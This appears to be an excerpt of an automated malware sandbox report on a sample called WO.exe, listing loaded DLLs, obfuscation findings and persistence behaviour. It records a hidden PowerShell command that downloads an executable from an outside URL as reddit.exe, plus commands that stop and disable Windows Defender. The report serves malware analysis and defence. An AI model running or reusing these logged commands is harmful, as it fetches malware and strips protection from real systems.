                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeSection loaded: wsock32.dll
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\Desktop\WO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: WO.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                  Source: Binary string: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb source: reddit.exe.5.dr

                                  Data Obfuscation

                                  barindex
                                  Suspicious powershell command line found
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
                                  Source: WO.exeStatic PE information: section name: .code
                                  Source: WO.exe.1.drStatic PE information: section name: .code
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_000000014001BD2E push rbx; ret 0_2_000000014001BD2F
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeCode function: 6_2_0040B840 push eax; ret 6_2_0040B86E
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeCode function: 6_2_00405A5C push edx; ret 6_2_00405A7D
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeCode function: 6_2_00406200 push esi; iretd 6_2_0040620B
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeCode function: 6_2_004032D4 push edx; retf 6_2_00403342
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeCode function: 6_2_004056AF push eax; retn 000Ch6_2_004056B0
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeCode function: 6_2_00407D07 push es; retf 6_2_00407D80
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeCode function: 6_2_00406D10 pushfd ; ret 6_2_00406D45
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeCode function: 6_2_0040211C push eax; retf 6_2_00402128
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeCode function: 6_2_00407D20 push es; retf 6_2_00407D80
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeCode function: 6_2_00403331 push edx; retf 6_2_00403342
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeCode function: 6_2_00407DB4 push ds; retf 6_2_00407DF6
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 17_2_000000014001BD2E push rbx; ret 17_2_000000014001BD2F
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 18_2_000000014001BD2E push rbx; ret 18_2_000000014001BD2F
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 48_2_000000014001BD2E push rbx; ret 48_2_000000014001BD2F
                                  Source: reddit.exe.5.drStatic PE information: section name: .text entropy: 7.006551052925149

                                  Persistence and Installation Behavior

                                  barindex
                                  Tries to download and execute files (via powershell)
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Uses cmd line tools excessively to alter registry or file data
                                  Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\reddit.exeJump to dropped file
                                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeJump to dropped file

                                  Boot Survival

                                  barindex
                                  Uses schtasks.exe or at.exe to add and modify task schedules
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop WinDefend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config WinDefend start= disabled

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Loading BitLocker PowerShell Module
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Users\user\Desktop\WO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
